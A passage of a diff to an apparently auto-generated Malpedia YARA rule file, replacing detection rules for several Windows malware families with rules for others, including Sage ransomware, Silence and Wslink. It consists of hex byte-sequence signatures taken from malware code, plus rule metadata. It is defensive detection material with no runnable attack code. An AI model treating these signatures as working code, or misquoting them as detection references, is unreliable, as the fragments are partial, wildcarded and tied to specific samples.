 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31d2 8944240c 662e0f1f840000000000 0f1f4000 3b6c2408 7306 }
-		$sequence_1 = { 04e3 89c1 89d8 bb3e000000 46 }
-		$sequence_2 = { 0fb66f01 0fb67702 0fb67f03 83e307 c1e312 }
-		$sequence_3 = { 0fb605???????? 84c0 0f8495010000 8b450c 85c0 7409 83f803 }
-		$sequence_4 = { 31c0 40 31ff 31db }
-		$sequence_5 = { 0fb7ce 25ff030000 c1e00a 81e1ff030000 }
-		$sequence_6 = { 31c8 31cf 29c8 19cf 3d10270000 }
-		$sequence_7 = { 31c0 40 81fd80000000 721b b802000000 81fd00080000 720e }
-		$sequence_8 = { 034a10 894de0 8b45e0 3b45dc 7606 8b4de0 894ddc }
-		$sequence_9 = { 034214 50 8b4df8 51 e8???????? }
-		$sequence_10 = { ffd1 83c408 ebbc 8b55fc 8b4208 50 e8???????? }
-		$sequence_11 = { 034110 50 8b550c 52 8b4de8 e8???????? }
-		$sequence_12 = { 034228 8945c4 6a00 6a01 6800000010 }
-		$sequence_13 = { 034828 8b55fc 894a2c eb0a }
-		$sequence_14 = { 0345e8 2b45d4 8945dc e9???????? }
-		$sequence_15 = { 03420c 50 ff15???????? 8945f8 837df800 }
+		$sequence_0 = { e9???????? 488b8540010000 488b8db8190000 4889c4 488b8558180000 488985d0000000 }
+		$sequence_1 = { e9???????? 488b8548340000 8b8d944d0000 4889c4 488b85484d0000 }
+		$sequence_2 = { 488b09 4863493c 4801c8 48898528340000 8b15???????? }
+		$sequence_3 = { 3d3f08c577 0f84d6280000 e9???????? 8b8584130000 }
+		$sequence_4 = { 48898d904d0000 e8???????? 4829c4 488b85500a0000 4889e1 48898d984d0000 }
+		$sequence_5 = { 0f8488000000 e9???????? 8b8554340000 3ddf29d6fa 0f84d0010000 }
+		$sequence_6 = { e8???????? 4829c4 488b8540180000 4889e2 48899550180000 }
+		$sequence_7 = { c70163382994 e8???????? 4829c4 4889e0 488985e05e0000 e9???????? }
 
 	condition:
-		7 of them and filesize < 4950016
+		7 of them and filesize < 12033024
 }
-rule MALPEDIA_Win_Neddnloader_Auto : FILE
+rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e15402b8-b469-5172-91e2-075f5a9b23c1"
+		id = "0cfc4781-9310-56a6-9786-dd48a9782a50"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neddnloader_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sage_ransom_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "77a49dc1eddd877e4d25ede9f8b3d2e84b63610bcd03fbfc5a12361b574a00c2"
+		logic_hash = "aa9c344ed40cd82065b24d270c712730728bf75ebcabdbfdec5a88ea8d283ad2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124638,40 +124891,40 @@ rule MALPEDIA_Win_Neddnloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b450c 8908 ff15???????? 8bc7 5f }
-		$sequence_1 = { c3 0fbcc0 8945f8 c1e803 2b45fc }
-		$sequence_2 = { 8b5508 69c0b179379e c1e813 33c9 66890c42 }
-		$sequence_3 = { 7506 83c102 83c202 3bcb }
-		$sequence_4 = { 83c104 83c204 3bcf 72f0 8d43ff 3bc8 7311 }
-		$sequence_5 = { 8bec 83e4f8 81ec10060000 a1???????? 33c4 8984240c060000 }
-		$sequence_6 = { 3bc8 7311 0fb702 0fb731 663bc6 7506 }
-		$sequence_7 = { 7501 41 8bc1 2b45fc 5f }
-		$sequence_8 = { ff15???????? e8???????? 488d1576570000 488d0d4f570000 }
-		$sequence_9 = { 4c8d4530 ba05000020 895d38 ff15???????? 85c0 749b }
-		$sequence_10 = { c1e818 0fb6c8 8bc3 c1eb10 }
-		$sequence_11 = { 4433a48180550100 400fb6c7 8bbd00020000 4433a48180590100 488d2d96d0ffff 4533650c 83ff0a }
-		$sequence_12 = { c1e818 0fb6c8 410fb6c0 4133ac8e803c0100 4133ac8680480100 418bc0 }
-		$sequence_13 = { 4133b48c804d0100 4133b48480590100 418bc0 41337510 c1e808 0fb6d0 418bc3 }
-		$sequence_14 = { 4c8bd2 4c8bd9 48395a10 750a b801000000 }
-		$sequence_15 = { 418bcd 41b981808080 4c8bde 412bcf 418bc1 4889742438 }
+		$sequence_0 = { 50 8d4c2430 51 e8???????? 8b542438 6a00 }
+		$sequence_1 = { 8da42400000000 8b442418 50 ffd7 8b742414 85f6 }
+		$sequence_2 = { 8d0c24 51 50 ff15???????? 833c2402 7564 }
+		$sequence_3 = { 8b503c 01542430 8b4840 014c2434 8b5044 }
+		$sequence_4 = { 56 57 8b7b04 03f9 8bf1 }
+		$sequence_5 = { 85c0 7907 83c8ff 83c408 c3 833c2441 }
+		$sequence_6 = { 8b442410 56 57 8bfa }
+		$sequence_7 = { 90 6aff 56 ffd3 8d4c2410 }
+		$sequence_8 = { 014114 8b4318 014118 8b431c }
+		$sequence_9 = { 014110 8b4314 014114 8b4318 }
+		$sequence_10 = { 014108 8b430c 01410c 8b4310 }
+		$sequence_11 = { 891c24 89442404 e8???????? 891c24 e8???????? e9???????? 83bd54fffffff6 }
+		$sequence_12 = { 013c13 83c102 46 ebd3 }
+		$sequence_13 = { 0101 8b4304 014104 8b4308 014108 }
+		$sequence_14 = { 01410c 8b4310 014110 8b4314 }
+		$sequence_15 = { 0119 117104 83c110 83c210 }
 
 	condition:
-		7 of them and filesize < 3438592
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Murkytop_Auto : FILE
+rule MALPEDIA_Win_Silence_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09c2c9ad-2fc4-523f-99a2-d7f06ef6936d"
+		id = "1d33ad52-7f8b-5849-8776-4b47a03b0b3b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.murkytop_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silence_auto.yar#L1-L413"
 		license_url = "N/A"
-		logic_hash = "e4a555eba2d93ac52653d0ddd1b98a4be2b8b9fd7f1c8d48fbca611f1976d1c2"
+		logic_hash = "20bb026c801a434e63744ede6d8b88ca9db1780c69681a4497ad49040c78c67b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124683,32 +124936,69 @@ rule MALPEDIA_Win_Murkytop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b35???????? c7450800000000 90 6800100000 8d8dd0eeffff 6a00 51 }
-		$sequence_1 = { e8???????? 8b5de0 8b75dc 8d4dec 83c418 8bf8 }
-		$sequence_2 = { eb0b 3d2f050000 0f855fffffff 8b45f4 85c0 }
-		$sequence_3 = { 77cf 56 ff15???????? 85c0 74c4 8b500c }
-		$sequence_4 = { 52 50 51 68???????? e8???????? 83c424 6a00 }
-		$sequence_5 = { 52 56 68???????? e8???????? 8b45fc }
-		$sequence_6 = { 6a01 51 ff15???????? 3bc6 743f 50 ff15???????? }
-		$sequence_7 = { 51 52 0fb6c0 50 68???????? 53 }
-		$sequence_8 = { eb08 8b4608 e8???????? 47 3b7d08 0f8c55ffffff 83fb05 }
-		$sequence_9 = { 33f6 8b4dfc 8b511c 52 }
+		$sequence_0 = { 740a 8a4801 40 84c9 75f4 eb05 803800 }
+		$sequence_1 = { e8???????? cc 8325????????00 c3 6a08 }
+		$sequence_2 = { 6a00 8d45fc 50 6a00 6a00 68???????? c745fc00000000 }
+		$sequence_3 = { 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? }
+		$sequence_4 = { ff15???????? 6a00 6800000004 6a00 }
+		$sequence_5 = { 46 56 8d85f8feffff 50 }
+		$sequence_6 = { f3c3 e9???????? e8???????? e9???????? 6a14 68???????? e8???????? }
+		$sequence_7 = { 68???????? ffd6 8b45fc 85c0 }
+		$sequence_8 = { 6801000080 ff15???????? 56 8d85f8feffff }
+		$sequence_9 = { 7408 8a5a01 42 84db }
+		$sequence_10 = { 57 6800000004 6a00 6a00 }
+		$sequence_11 = { 6a00 8bf8 6a00 57 ff15???????? 8d45fc }
+		$sequence_12 = { 5e 5b 5d c3 c60200 }
+		$sequence_13 = { 84c9 75f4 eb0d 803800 7408 8a5a01 }
+		$sequence_14 = { ff30 c745fc00000000 57 ff15???????? }
+		$sequence_15 = { 6a00 8d8db4f7ffff 51 50 }
+		$sequence_16 = { ff15???????? 8d85b8f7ffff 50 6800080000 }
+		$sequence_17 = { 03d7 3b56f0 7611 8b46ec 8d4eec }
+		$sequence_18 = { ff5004 8b46f8 0346f4 57 ff7508 }
+		$sequence_19 = { 7412 8b01 52 8d95f0fdffff 52 ff10 8b95ecfdffff }
+		$sequence_20 = { ff76f8 e8???????? 83c41c 895ef8 897ef0 5b 5f }
+		$sequence_21 = { ffd6 ff7704 ffd6 ff770c ffd6 ff7708 ffd6 }
+		$sequence_22 = { 50 e8???????? ff76f8 e8???????? }
+		$sequence_23 = { 8b17 8bcf ff5210 8b17 8bcf ff5208 }
+		$sequence_24 = { 898df8fbffff 8d8dfcfbffff 51 ffb5f0fbffff 8bcb ff5038 85c0 }
+		$sequence_25 = { ff15???????? ba180c0000 b940000000 ff15???????? }
+		$sequence_26 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? }
+		$sequence_27 = { e8???????? ba00040000 b940000000 ff15???????? }
+		$sequence_28 = { 99 83e203 03c2 c1f802 89442440 }
+		$sequence_29 = { d3f8 0fb60d???????? d3e0 85c0 }
+		$sequence_30 = { d3e8 0fb6c8 8b05???????? d3e0 }
+		$sequence_31 = { 8b05???????? d3e0 8b0d???????? 03c8 }
+		$sequence_32 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 }
+		$sequence_33 = { 55 8bec ff4d08 755d 833d????????04 }
+		$sequence_34 = { 85c0 750e 68???????? ff15???????? c20800 53 }
+		$sequence_35 = { ff15???????? 68c0d40100 ff15???????? e9???????? }
+		$sequence_36 = { 8b3d???????? 85c0 7507 68???????? ffd7 6a00 }
+		$sequence_37 = { 8d0441 33d2 b905000000 f7f1 }
+		$sequence_38 = { c705????????00000000 c705????????03000000 c705????????00000000 c705????????04000000 ff15???????? 85c0 750b }
+		$sequence_39 = { ff15???????? c20800 53 8b1d???????? 57 0f57c0 }
+		$sequence_40 = { 750b 68???????? ff15???????? ff35???????? }
+		$sequence_41 = { 68???????? 68???????? ff15???????? a3???????? 85c0 750e }
+		$sequence_42 = { c705????????00000000 ffd3 8b3d???????? 85c0 }
+		$sequence_43 = { 50 6a00 ff15???????? 6a00 6a00 68???????? }
+		$sequence_44 = { 03048db0354200 50 ff15???????? 5d }
+		$sequence_45 = { 03048db0354200 eb05 b8???????? f6402820 }
+		$sequence_46 = { 03048db0354200 eb02 8bc6 80782900 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 70128640
 }
-rule MALPEDIA_Win_Moonbounce_Auto : FILE
+rule MALPEDIA_Win_Laziok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2da98614-65a4-5227-bf42-e140c3206599"
+		id = "37e29cbd-65ea-5cba-b131-e7a5cbb3dccc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moonbounce_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.laziok_auto.yar#L1-L97"
 		license_url = "N/A"
-		logic_hash = "c88f40d1d857bf1c76177c0c7eb43f16650b71d1b80bdf0f0745bd71c4b7c892"
+		logic_hash = "c9f66361581dd6b09edf0f02e114cd674601a3020169deaf28372627acd9b101"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124722,32 +125012,30 @@ rule MALPEDIA_Win_Moonbounce_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4120 83c114 894df8 85c0 0f857bffffff eb04 }
-		$sequence_1 = { f7c2feffffff 7640 eb03 8b4df0 8b5508 }
-		$sequence_2 = { 50 ffd6 8b4310 33f6 }
-		$sequence_3 = { ff15???????? 57 57 83c60c }
-		$sequence_4 = { 7439 3bc6 7435 6a30 }
-		$sequence_5 = { 55 8bec 83ec30 53 33db 53 }
-		$sequence_6 = { 56 8b30 57 8b7d08 6a05 }
-		$sequence_7 = { 33d2 8d443018 663b5606 7342 }
-		$sequence_8 = { 50 e8???????? 8b7d08 81c700080000 b980000000 }
-		$sequence_9 = { c745f4d2070100 895dec ff15???????? 53 6a01 53 }
+		$sequence_0 = { 39742410 741b ff742410 ff15???????? 8bf0 85f6 }
+		$sequence_1 = { 59 85f6 7410 46 }
+		$sequence_2 = { ff750c ff7608 ff15???????? eb3f 6a02 58 }
+		$sequence_3 = { 837c240cff 8937 7502 8bf7 5f 8bc6 }
+		$sequence_4 = { 833e01 7513 6a00 ff7510 ff750c }
+		$sequence_5 = { 2bc6 d1f8 83f801 7d03 }
+		$sequence_6 = { 2bc6 d1f8 83f901 7d07 }
+		$sequence_7 = { 7404 8b00 eb03 8b4610 }
 
 	condition:
-		7 of them and filesize < 70912
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Jimmy_Auto : FILE
+rule MALPEDIA_Win_Scranos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e00c47ff-70b5-5db3-a3df-5549a310a9aa"
+		id = "3bc50a28-b6e6-5463-a597-05290715703b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jimmy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scranos_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1b3730a9d32503c4a70a6daa21a4c8b83fd1ef93162a202906ad5585e6f013b5"
+		logic_hash = "55c9e24c122b178b35286bb9d84ccadcfb35aee7a1a2177725fac28566a869c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124761,32 +125049,32 @@ rule MALPEDIA_Win_Jimmy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0345e4 8945f0 8b45fc 2b45e4 8945fc 8b451c }
-		$sequence_1 = { 8b45fc 40 8945fc ebe6 8b45fc c9 c3 }
-		$sequence_2 = { 40 898584fbffff 8b8584fbffff 3b8588fbffff 0f83bc000000 6a08 }
-		$sequence_3 = { 6a01 ff7508 e8???????? 59 59 f7d8 }
-		$sequence_4 = { 8365f800 8d45f8 50 6a00 ff7508 a1???????? ffb030010000 }
-		$sequence_5 = { 751a 8b4508 ff7024 e8???????? 59 8b4508 }
-		$sequence_6 = { 8b45f4 0fb700 8b4dfc 0fb709 3bc1 7514 33c0 }
-		$sequence_7 = { 8b45f0 2b45f4 50 ff75f4 ff75fc e8???????? 83c40c }
-		$sequence_8 = { 8945f8 837df800 7449 837d1000 7408 }
-		$sequence_9 = { 7406 837df400 7507 32c0 e9???????? 8b45f0 05f8000000 }
+		$sequence_0 = { 8b5510 0355fc 8a02 8845fb 0fbe4dfb 85c9 0f848a000000 }
+		$sequence_1 = { b83f000000 5b 83c408 c3 894f10 894714 8b96280c0000 }
+		$sequence_2 = { 8b55e8 3b956cffffff 0f8d9c000000 8b45e8 8b8c8530ffffff 8b55e8 8b4154 }
+		$sequence_3 = { 8b55e8 8b451c 8b0c90 6bc918 8b5514 8b4204 8b0c08 }
+		$sequence_4 = { 8b55fc 52 e8???????? 83c408 8945f8 817df8ce030000 7739 }
+		$sequence_5 = { 8bca 81e10000f000 81f900004000 56 57 7f6c 7455 }
+		$sequence_6 = { e9???????? e8???????? 85c0 747d 8b442418 8b4c2414 830b02 }
+		$sequence_7 = { e8???????? 8945b0 8b4db0 898d30ffffff 8d9530ffffff 52 8b8decfeffff }
+		$sequence_8 = { 8b8d9cfeffff 8b511c 52 8b8580feffff 50 8b4d08 51 }
+		$sequence_9 = { 8bd3 8b32 3b31 7512 83e804 83c104 83c204 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 2859008
 }
-rule MALPEDIA_Win_Jssloader_Auto : FILE
+rule MALPEDIA_Win_Syscon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90fc04b9-9652-536e-8f60-72fc9a34063b"
+		id = "62914e2c-226d-5cbb-90b0-89a5b7c1ce63"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jssloader_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.syscon_auto.yar#L1-L179"
 		license_url = "N/A"
-		logic_hash = "97165a1c6774cf73430e22299a3df7b55ab3c7ba699c480d4641c6a6e116c33b"
+		logic_hash = "302ef373551197e8ed957c8603c0bcf0757f29f0db7a8e8349d7ddb01c77aa30"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124800,32 +125088,38 @@ rule MALPEDIA_Win_Jssloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8ffffff7f 8b5110 2bc2 83f802 0f82a7030000 83791410 }
-		$sequence_1 = { 8bf8 83e73f 6bdf38 031c95701d4400 b9???????? }
-		$sequence_2 = { 50 e8???????? 83a6701d440000 59 83c604 81fe00020000 72dd }
-		$sequence_3 = { c745d40f000000 c645c000 e8???????? 8d8df4feffff c745fc00000000 e8???????? 8d4dc0 }
-		$sequence_4 = { 8d8d7cfcffff e8???????? 83bd30fdffff10 8d951cfdffff ffb52cfdffff 0f43951cfdffff }
-		$sequence_5 = { c68500feffff00 e8???????? c645fc1d 8d8d18feffff 6a07 68???????? c78528feffff00000000 }
-		$sequence_6 = { 83c604 c700???????? 56 e8???????? 8b45e4 8b4dec 8945ec }
-		$sequence_7 = { 68???????? 68???????? 6a00 c745b400000000 c745b80f000000 c645a400 ff15???????? }
-		$sequence_8 = { 0f8483000000 eb7d 8b1c9d58414300 6800080000 6a00 53 ff15???????? }
-		$sequence_9 = { 8bd6 7202 8b16 ff7610 8bc8 }
+		$sequence_0 = { 6a00 6a00 6a00 6a01 6a00 ff15???????? a3???????? }
+		$sequence_1 = { 68???????? 68???????? 8818 ff15???????? 68???????? ffd6 53 }
+		$sequence_2 = { 52 8845ff ffd7 0fb64e02 ba???????? 51 2ac2 }
+		$sequence_3 = { ffd3 83f8ff 74d3 50 ff15???????? 8d442418 }
+		$sequence_4 = { 898424d80b0000 53 56 57 8b3d???????? }
+		$sequence_5 = { 68???????? 57 ffd3 8bf0 8bd6 2bd7 42 }
+		$sequence_6 = { 55 8bec 8b4508 48 7458 83e803 }
+		$sequence_7 = { 53 68???????? 53 53 891d???????? ff15???????? }
+		$sequence_8 = { ff15???????? 488d542420 488d0df6500000 448bc0 e8???????? 488d542420 }
+		$sequence_9 = { 41be01000000 488b9dd00f0000 488d9560030000 498bcd ff15???????? }
+		$sequence_10 = { ff15???????? 488905???????? 4885c0 0f845af5ffff }
+		$sequence_11 = { 4c89742440 4c89742438 c744243000000008 4489742428 4c89742420 ff15???????? 488b8d700c0000 }
+		$sequence_12 = { ff15???????? 488d9520040000 488d0dd32e0000 448bc0 e8???????? 488d5590 }
+		$sequence_13 = { e8???????? 488d9560010000 488d4c2450 e8???????? e9???????? 48895c2408 4889742410 }
+		$sequence_14 = { 0fb7542466 440fb75c246c 0fb744246a 440fb74c2462 44895c2438 89442430 }
+		$sequence_15 = { 488d8d10020000 ff15???????? 488d4d90 448bc3 33d2 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 120832
 }
-rule MALPEDIA_Win_Datper_Auto : FILE
+rule MALPEDIA_Win_Huskloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48b52ade-f95f-5b7e-bf6c-1ada03264771"
+		id = "2b71c66f-6603-595c-99bb-89c942583260"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.datper_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.huskloader_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "34ec1eabfa283c917df6f57bb7cf677574c84996d2deb9b676fabcef09eea21f"
+		logic_hash = "0b5c5ed5027920c73090f364afb1f0be41c97145cf9de72e357bac2712d50fca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124839,32 +125133,32 @@ rule MALPEDIA_Win_Datper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45a0 50 8b45a8 50 e8???????? }
-		$sequence_1 = { 56 53 e8???????? a3???????? 8d95d8fbffff b8???????? e8???????? }
-		$sequence_2 = { 8b4514 50 68???????? 53 }
-		$sequence_3 = { e8???????? 8bf8 8b8574d7ffff a3???????? 68e8030000 e8???????? 8d45e4 }
-		$sequence_4 = { d1e8 8bf0 8d45e8 50 8bce 8bd3 }
-		$sequence_5 = { ba???????? 8b45fc e8???????? 8b95ecf9ffff b8???????? e8???????? 8d85e8f9ffff }
-		$sequence_6 = { 55 68???????? 64ff30 648920 8d8578ffffff 50 e8???????? }
-		$sequence_7 = { 75cd 8b45f8 5f 5e 5b }
-		$sequence_8 = { 83c604 4b 75ed bb02000000 8bf7 83c8ff e8???????? }
-		$sequence_9 = { 8bd6 8bc6 e8???????? 33ff c745f400004000 }
+		$sequence_0 = { 8bc7 83e03f 6bc838 8b0495e88d0110 }
+		$sequence_1 = { 59 e9???????? c745e003000000 e9???????? c745e4c05e0110 ebb8 d9e8 }
+		$sequence_2 = { 6a00 681f000f00 50 ff15???????? 85c0 }
+		$sequence_3 = { 740e 50 e8???????? 83a6e88d011000 59 83c604 81fe00020000 }
+		$sequence_4 = { 8d043b 8b3485601f0110 8d4601 8945fc 8a06 46 }
+		$sequence_5 = { 57 8bb81c060000 6a40 6800300000 56 6a00 ff15???????? }
+		$sequence_6 = { 85c0 7411 8b35???????? b98b010000 }
+		$sequence_7 = { 7420 6bc618 57 8db8288c0110 57 ff15???????? }
+		$sequence_8 = { 8b35???????? 85f6 7420 6bc618 57 8db8288c0110 57 }
+		$sequence_9 = { 0fb704850c3b0110 8d048508320110 50 8d8590faffff 03c7 50 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
+rule MALPEDIA_Win_Skinnyboy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2404684e-f88f-5795-bbdc-963d4ddd15f4"
+		id = "fad10de8-1dee-57f5-9740-77610ecb50ba"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_sphinx_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skinnyboy_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "f8ae31764c1b32c59de8e620b679e44d219bf08111b95222bfeb2c4359a4f338"
+		logic_hash = "c9afcf0da0b1a37ea370d6affaf9ae89cf13a4478cab0becac117427110aff91"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124878,38 +125172,32 @@ rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 }
-		$sequence_1 = { 52 52 ff35???????? 50 e8???????? 8b5508 83c40c }
-		$sequence_2 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? }
-		$sequence_3 = { 50 e8???????? 83c420 48 }
-		$sequence_4 = { 50 e8???????? 83c430 85c0 7e0c }
-		$sequence_5 = { 50 e8???????? 83c418 68???????? 68???????? }
-		$sequence_6 = { 50 e8???????? 84c0 745f 8d442414 }
-		$sequence_7 = { 50 e8???????? 83c410 c78324020000ffffffff c7832802000000000000 }
-		$sequence_8 = { 01fc eb98 035e14 8ade }
-		$sequence_9 = { 010d???????? 60 5a 98 }
-		$sequence_10 = { 0303 50 ff550c 8b3e }
-		$sequence_11 = { 020a 42 1af6 af }
-		$sequence_12 = { 0162c9 cf 0c06 3c3e }
-		$sequence_13 = { 003b c09bdbe23ea11c 695600663ec700 de07 }
-		$sequence_14 = { 010c02 3bf7 0f85f0f50000 e9???????? }
-		$sequence_15 = { 0008 d7 9f b2d3 }
+		$sequence_0 = { 888158050110 41 ebe8 8975e0 }
+		$sequence_1 = { 8d8560fdffff 50 8d8558fbffff 50 }
+		$sequence_2 = { 8975fc 8b45e0 8b048510110110 f644030401 }
+		$sequence_3 = { 837de416 7426 8d45e0 50 ff15???????? 8d45e0 50 }
+		$sequence_4 = { 8d8df0feffff e8???????? 83c408 8d5508 8d8de4feffff }
+		$sequence_5 = { c78578ffffff01591244 c7857cffffff09020f1c c745804a6a2362 c7458413051f17 c6458853 }
+		$sequence_6 = { 8bf7 83e61f c1e606 03348510110110 837e0800 7530 }
+		$sequence_7 = { ffd7 50 ffd6 6800dd6d00 ff35???????? }
+		$sequence_8 = { 8b9dd4feffff 8b85e4feffff 53 50 8d8dd8feffff e8???????? }
+		$sequence_9 = { 8d45f4 50 ff7308 ff15???????? 8b15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 3268608
+		7 of them and filesize < 176128
 }
-rule MALPEDIA_Win_Spybot_Auto : FILE
+rule MALPEDIA_Win_Wslink_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a4cba476-a2c7-50aa-a7bf-4af17da5b6df"
+		id = "fab4adfe-31ab-528e-91bb-69ff368202dc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spybot_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wslink_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d537b785313261fc15df85466bf871fb981ce27e93c3d7cf670a5bb54b105b2b"
+		logic_hash = "043911efcdbe30576afee29cea013b6adde98869fbb9875f474aa30d6ea1369e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124923,32 +125211,32 @@ rule MALPEDIA_Win_Spybot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 50 57 e8???????? 59 50 ff7518 }
-		$sequence_1 = { 3bc7 7309 83ffff 0f8599080000 53 e8???????? 59 }
-		$sequence_2 = { f7f1 8bd8 ff15???????? ff75e4 e8???????? 3975c8 }
-		$sequence_3 = { 83c624 3b7dfc 0f8c66ffffff 395df8 0f8512ffffff ff75f4 }
